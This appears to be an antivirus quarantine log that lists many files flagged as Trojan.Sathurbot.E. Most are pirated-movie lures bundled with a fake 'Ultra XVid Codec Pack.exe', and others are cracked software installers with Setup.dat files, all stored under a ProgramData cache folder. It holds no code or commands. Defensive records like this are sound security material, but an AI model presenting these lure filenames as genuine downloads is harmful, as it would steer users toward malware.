Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a6e8ba69ae6d2e1eaa905bca8e6d90ff\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a72f77f761f89e309c894b03d2e7bd4c\Betting on Zero 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a72f77f761f89e309c894b03d2e7bd4c\Betting on Zero 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a72f77f761f89e309c894b03d2e7bd4c\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ad8eefaf5286cbec0bb75eaf1b2ffb47\The Shack 2017.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ad8eefaf5286cbec0bb75eaf1b2ffb47\The Shack 2017.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ad8eefaf5286cbec0bb75eaf1b2ffb47\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\af5a4f550df3e39b45118d0d96b32d4d\Microsoft Flight Simulator X Steam.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\af5a4f550df3e39b45118d0d96b32d4d\Microsoft Flight Simulator X Steam.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\af5a4f550df3e39b45118d0d96b32d4d\Setup1.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\af5a4f550df3e39b45118d0d96b32d4d\Setup2.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\af9461fa3a552f3ca0478dcfc0ac362a\Call of Duty Modern Warfare 2.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\af9461fa3a552f3ca0478dcfc0ac362a\Call of Duty Modern Warfare 2.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\af9461fa3a552f3ca0478dcfc0ac362a\Setup1.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\af9461fa3a552f3ca0478dcfc0ac362a\Setup2.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b5becf525befbe03d39413cf887d1417\Bazodee 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b5becf525befbe03d39413cf887d1417\Bazodee 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b5becf525befbe03d39413cf887d1417\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b6d721cc81888d2fc338219aee682db8\Beauty and the Beast 2017.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b6d721cc81888d2fc338219aee682db8\Beauty and the Beast 2017.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b6d721cc81888d2fc338219aee682db8\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b993a99472521cbdaeeeb07bfbc5ef99\Goat 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b993a99472521cbdaeeeb07bfbc5ef99\Goat 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\b993a99472521cbdaeeeb07bfbc5ef99\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\be57846cb109cd96783d9a09e8d76664\CyberLink PowerDirector Ultimate 14.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\be57846cb109cd96783d9a09e8d76664\CyberLink PowerDirector Ultimate 14.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\be57846cb109cd96783d9a09e8d76664\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a63c101ceef39a9d9ba8542329670eb6\How to Get Away With Murder [SE03].txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a63c101ceef39a9d9ba8542329670eb6\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a63c101ceef39a9d9ba8542329670eb6\Video.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c14debd37305c8b9ee44aaba46212b4f\UltraISO 9.6.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c14debd37305c8b9ee44aaba46212b4f\UltraISO 9.6.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c569574822bef5c4d80349b4230032cd\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c569574822bef5c4d80349b4230032cd\Video.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c569574822bef5c4d80349b4230032cd\Westworld [SE01].txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d2c89325d0d3f197b28dfd6d7b3c47dd\Life Animated 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d2c89325d0d3f197b28dfd6d7b3c47dd\Life Animated 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d2c89325d0d3f197b28dfd6d7b3c47dd\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\df99cab0dad57776f1c2ff98e43905ba\Cakewalk SONAR X3.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\df99cab0dad57776f1c2ff98e43905ba\Cakewalk SONAR X3.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\df99cab0dad57776f1c2ff98e43905ba\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ece31a64f1410072be86549af78ad112\Setup1.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ece31a64f1410072be86549af78ad112\Setup2.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ece31a64f1410072be86549af78ad112\Watchdogs 2014.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ece31a64f1410072be86549af78ad112\Watchdogs 2014.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\22501a12640e0d2eacdf764df1625909\Eddie the Eagle 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\22501a12640e0d2eacdf764df1625909\Eddie the Eagle 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\22501a12640e0d2eacdf764df1625909\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\22c18af08e624e272bd4f1ae69f33d99\Operation Mekong 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\22c18af08e624e272bd4f1ae69f33d99\Operation Mekong 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\22c18af08e624e272bd4f1ae69f33d99\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2393dd19a8c1e641f1a6d74c8d2683f1\Ice Age Collision Course 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2393dd19a8c1e641f1a6d74c8d2683f1\Ice Age Collision Course 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2393dd19a8c1e641f1a6d74c8d2683f1\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\24487c94123c38ad51f71f3c5f17e6db\TechSmith SnagIt 13.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\24487c94123c38ad51f71f3c5f17e6db\TechSmith SnagIt 13.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\24956a069784f3ee4da71dc6b3b6709c\Florence Foster Jenkins 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\24956a069784f3ee4da71dc6b3b6709c\Florence Foster Jenkins 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\24956a069784f3ee4da71dc6b3b6709c\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2513dc81a92b9c05964b6fb577b29a92\ADOBE PHOTOSHOP CS6.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2513dc81a92b9c05964b6fb577b29a92\ADOBE PHOTOSHOP CS6.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2513dc81a92b9c05964b6fb577b29a92\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\25856f397a70bac6d97a0590bb1daf27\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\25856f397a70bac6d97a0590bb1daf27\Underworld Blood Wars 2017.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\25856f397a70bac6d97a0590bb1daf27\Underworld Blood Wars 2017.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2589dfd756006a29a162ca3059761bd6\Adobe Media Encoder CC 2015.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2589dfd756006a29a162ca3059761bd6\Adobe Media Encoder CC 2015.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2589dfd756006a29a162ca3059761bd6\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\26ba1fe505f5eb72eb8b08b07b9d2633\COREL DRAW X5.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\26ba1fe505f5eb72eb8b08b07b9d2633\COREL DRAW X5.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\26ba1fe505f5eb72eb8b08b07b9d2633\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\26def096d365a8ee4277c5319f81ab58\The Edge of Seventeen 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\26def096d365a8ee4277c5319f81ab58\The Edge of Seventeen 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\26def096d365a8ee4277c5319f81ab58\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\28d94aa8445f8afba3336edb1c27b14c\A Street Cat Named Bob 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\28d94aa8445f8afba3336edb1c27b14c\A Street Cat Named Bob 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\28d94aa8445f8afba3336edb1c27b14c\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\85524c5aa24a5a95e16b6e1c4cff571d\Songr 2.0.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\85524c5aa24a5a95e16b6e1c4cff571d\Songr 2.0.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8758a28d48ed0a7839dc483fbd6f7129\Avid Pro Tools HD 10.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8758a28d48ed0a7839dc483fbd6f7129\Avid Pro Tools HD 10.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8758a28d48ed0a7839dc483fbd6f7129\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\88f798ca90cbd3179f8c504a8fd6a1af\Autodesk AutoCAD 2017.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\88f798ca90cbd3179f8c504a8fd6a1af\Autodesk AutoCAD 2017.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\88f798ca90cbd3179f8c504a8fd6a1af\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8a1156fd41d78cd113ac0549e754baa2\Dhoni The Untold Story 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8a1156fd41d78cd113ac0549e754baa2\Dhoni The Untold Story 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8a1156fd41d78cd113ac0549e754baa2\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8afb95ef0d1220d23b9623bffcb9ff57\Roxio Creator NXT 4.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8afb95ef0d1220d23b9623bffcb9ff57\Roxio Creator NXT 4.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8afb95ef0d1220d23b9623bffcb9ff57\Setup1.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8afb95ef0d1220d23b9623bffcb9ff57\Setup2.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8b609eedd6bb25c595cd09546420db93\Ghostbusters 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8b609eedd6bb25c595cd09546420db93\Ghostbusters 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8b609eedd6bb25c595cd09546420db93\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8da3583b712916b4cac4f9f3f02fdaeb\The Girl with All the Gifts.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8da3583b712916b4cac4f9f3f02fdaeb\The Girl with All the Gifts.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8da3583b712916b4cac4f9f3f02fdaeb\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9090ad3a074b1da3fdf2b2aab969e097\Money Monster 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9090ad3a074b1da3fdf2b2aab969e097\Money Monster 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9090ad3a074b1da3fdf2b2aab969e097\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\915c0ea71bd2103634fb93120059f2d0\Setup1.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\915c0ea71bd2103634fb93120059f2d0\Setup2.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\915c0ea71bd2103634fb93120059f2d0\World of Warcraft 6.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\915c0ea71bd2103634fb93120059f2d0\World of Warcraft 6.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\920c265457f24c84dad5cc6f91f841e4\The Wasted Times 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\920c265457f24c84dad5cc6f91f841e4\The Wasted Times 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\920c265457f24c84dad5cc6f91f841e4\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c5e7172ccbca5ee12ccec8dbfbb0a916\AVG Antivirus Pro 2016.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c5e7172ccbca5ee12ccec8dbfbb0a916\AVG Antivirus Pro 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c5e7172ccbca5ee12ccec8dbfbb0a916\Setup.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c7db0c3f907b23bfa8df0829534cc38e\The Big Bang Theory [SE09].txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c7db0c3f907b23bfa8df0829534cc38e\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c7db0c3f907b23bfa8df0829534cc38e\Video.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ca5e0d1ed3240ff21f1ae59191855325\Risen 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ca5e0d1ed3240ff21f1ae59191855325\Risen 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ca5e0d1ed3240ff21f1ae59191855325\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cc245c8e4392379c24dc19aa1df88b76\Kong Skull Island 2017.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cc245c8e4392379c24dc19aa1df88b76\Kong Skull Island 2017.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cc245c8e4392379c24dc19aa1df88b76\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cc6b0cf1d835f721d67b8e62a3e764e5\10 Cloverfield Lane 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cc6b0cf1d835f721d67b8e62a3e764e5\10 Cloverfield Lane 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cc6b0cf1d835f721d67b8e62a3e764e5\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cddb6acc16ff9137398363bbe03263de\The Great Gilly Hopkins 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cddb6acc16ff9137398363bbe03263de\The Great Gilly Hopkins 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cddb6acc16ff9137398363bbe03263de\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ce09e7ac485e61a20d82d8fa43a506a3\Assassins Creed 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ce09e7ac485e61a20d82d8fa43a506a3\Assassins Creed 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\ce09e7ac485e61a20d82d8fa43a506a3\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cfe2d42980cc06cdf0bbfd4e6960915b\Fist Fight 2017.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cfe2d42980cc06cdf0bbfd4e6960915b\Fist Fight 2017.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\cfe2d42980cc06cdf0bbfd4e6960915b\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d031285af48b90962abac2afc48200b5\The Lovers and the Despot 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d031285af48b90962abac2afc48200b5\The Lovers and the Despot 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d031285af48b90962abac2afc48200b5\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d04cb8eb0f0b9d030a0eae397e515d1a\Deus Ex Mankind Divided Digital Deluxe.exe, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d04cb8eb0f0b9d030a0eae397e515d1a\Deus Ex Mankind Divided Digital Deluxe.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d04cb8eb0f0b9d030a0eae397e515d1a\Setup1.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d04cb8eb0f0b9d030a0eae397e515d1a\Setup2.dat, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d1a43a55c3bda34650bb9294a135abc2\Sultan 2016.avi, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d1a43a55c3bda34650bb9294a135abc2\Sultan 2016.txt, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\d1a43a55c3bda34650bb9294a135abc2\Ultra XVid Codec Pack.exe, Quarantined, [2851], [355073],1.0.1064
